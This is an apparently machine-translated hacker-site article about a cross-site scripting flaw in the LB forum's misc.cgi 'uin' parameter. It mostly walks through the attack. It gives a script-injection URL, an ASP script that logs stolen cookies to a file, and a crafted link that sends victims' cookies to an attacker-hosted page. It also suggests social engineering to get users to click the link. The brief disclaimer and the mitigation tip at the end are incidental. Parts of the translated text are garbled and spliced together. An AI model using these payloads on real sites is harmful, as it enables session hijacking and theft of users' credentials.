LB Forum (all versions) Cross-Site Scripting Vulnerability
Author: Like original Article Source: Huaxia Hacker Alliance http://www.77169.org
Friends who are familiar with the LB series forum may know that there are two methods to use the cookis of LB, one is the full path mode, and the other is the root directory mode, the so-called full path mode is stored locally in a directory like this, for example: www.target.com/cgi-bin, that is, all the cookies generated under the CGI-BIN directory are stored here, I think this was designed by the author considering the use of multiple LB forums under one domain name, while achieving his own design goals, this option also reduces the use scope of Cross-Site Scripting, which is a little more difficult to use in this mode, so why is it easy to exploit this type of vulnerability in the root directory mode? Haha, let's take a look at the situation where flash and images are prevalent across sites and related technologies are gradually maturing. For the Forum LB, he generally has two home directories respectively for CGI-BIN and NON-CGI, Forum almost 99% of the running files are stored in the CGI-BIN directory, and in the NON-CGI directory stored almost all write static page files, and images. Another part is the files uploaded by the user. According to my observations, more than 80% of forums allow users to upload their own portraits or HTML, txt, and Flash attachments. If a Forum allows users to upload jpg and GIF images, SWF unzip get.com/cgi-bin is a contrast. All cookiesin this forum are stored in www.tar gert.com. The difference between the two is that the latter does not specify a specific directory, that is, all directories on the entire site are stored in "alert (events. cookie) "You can see all the cookie information on that site)
The XSS (Cross-Site Scripting) vulnerability in the Forum itself is not mentioned. Only * These carefully constructed images and Flash files are enough to reach the goal (how to use images, and flash achieve cross-site purpose, not discussed in this article, friends who do not know now can refer to the relevant information)
Therefore, this article is intended to set the cookie mode to the full path mode site, of course, the site set to the root directory mode is also applicable.
The problem lies in the MISC In the cgi-bin directory. in this CGI file, that is, ICQ in the Forum's friends column, the uin variable is not filtered during submission, and uin is displayed as the ICQ number, as a normal submission, this is the case.
Http://www.target.com/cgi-bin/misc.cgi? Action = ICQ & uin = 123456 123456 is the ICQ number, and if the following commit is constructed:
Http://www.target.com/cgi-bin/misc.cgi? Action = ICQ & uin = <; SCRIPT> alert (events. cookie) </SCRIPT> then your cookies on the forum will be exposed. How can we use them? First, you must have an acceptance script to receive outgoing cookies, of course, there will be your desired user name and password in cookies, and this script should be placed in any space with its own domain name. The common ASP script is as follows:
Thanks to LCX:
============================================
<%
Testfile = server. mappath ("cookies.txt ")
MSG = request ("MSG ")
Set FS = server. Createobject ("scripting. File *** object ")
Set thisfile = FS. opentextfile (testfile, 8, true, 0)
Thisfile. writeline ("" & MSG &"")
Thisfile. Close
Set FS = nothing
%>
Copy and save this code as a XXX. asp file. Put it in your own space. Free Space is everywhere ~~ Additionally, you will also be given a domain name of no matter how many levels, and there are also a lot of support for ASP :)
Now we can construct the client URL. We want to upload the cookies we get to our own space and store them in a TXT file through a script that has already been placed, to obtain user information.
The URL to be accessed by the user is constructed as follows:
Http://www.sohu.com/XXX.asp? MSG % 3d % 27% 2B "target = _ blank> http://www.target.com/cgi-bin/misc.cgi? Action = ICQ & uin = % 3 cscript % 3ewindow. Location. href % 3d % 2 http://www.sohu.com/XXX.asp? MSG % 3d % 27% 2bdocuments. Cookie % 3C/script % 3E
Your text file is waiting for you to retrieve. Here www.sohu.com is the path for placing XXX. asp on your site. Www.target.com is the URL of the forum you want to attack.
As for how to allow users to access this connection, you just need to think about it. What kind of social engineering knowledge ~~ You can use anything like your wit, sensitivity, and courage, but only for security research. If you use this method to destroy it, without contempt, I shall not assume any legal direct or indirect responsibilities or losses.
After reading this article, some may ask, what should I do if the user does not choose to save the cookie locally, his/her cookies are stored in the current browser process. Are you smart about how to do it? :). Have a good time and do not destroy it.
This article may be just another XSS vulnerability for friends who have been familiar with XSS in the past. For new users, this article does not give a thorough explanation of the cause of cross-site scripting, you may need to have some related knowledge as the basis.
For all friends who use the LB forum, it is recommended to delete the mice under the CGI-BIN directory before the official patch does not come out. cgi files, and qualified friends should immediately set the cookie mode to the full path mode, which is set under the basic variables of the Forum.